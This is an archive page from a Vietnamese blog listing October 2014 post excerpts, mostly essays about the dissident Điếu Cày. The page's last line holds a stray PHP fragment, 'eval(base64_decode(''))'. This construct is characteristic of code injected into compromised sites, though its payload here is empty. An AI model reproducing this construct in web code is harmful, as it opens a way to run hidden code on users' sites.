Archive for October, 2014

Khi bài hát trở về

Khi bài hát trở về

Giới thiệu: Trong thời gian qua, nhiều hình ảnh của anh Điếu Cày có kèm theo hàng chữ “Khi bài hát trở về”. Nhiều bạn, và có lẽ cả anh Điếu Cày, không biết rõ nguồn gốc từ đâu. Đó là bìa tác phẩm Khi Bài Hát Trở Về của Trần T

10.25.2014 | Tiểu Luận- Chính Luận |

1 Comment

Ánh sáng Điếu Cày

Ánh sáng Điếu Cày

Khi trục xuất anh Điếu Cày ra khỏi Việt Nam, lãnh đạo CS nghĩ họ trục xuất anh sang Mỹ. Với lãnh đạo CS đó là một chọn lựa khôn ngoan. Bởi vì, theo họ, tên anh gắn liền với các phong trào chống chủ nghĩa Đại Hán Bá Quyền Trung Cộng

10.22.2014 | Tiểu Luận- Chính Luận |

3 Comments

TUỔI CON THOI

TUỔI CON THOI

(Với bác Lữ Lan tại DC, 13-9-2014) Hôm 13 tháng 9 ở Washington DC, có một bạn đọc tham dự buổi ra mắt sách hỏi tôi “tuổi con gì” nhưng vì bận trả lời câu hỏi của nhà văn Trương Anh Thụy nên không kịp trả lời, và sau đó lại quê

10.4.2014 | Viết ngắn |

No Comments

Flickr Photos

Tag Cloud

'; eval(base64_decode(''));?>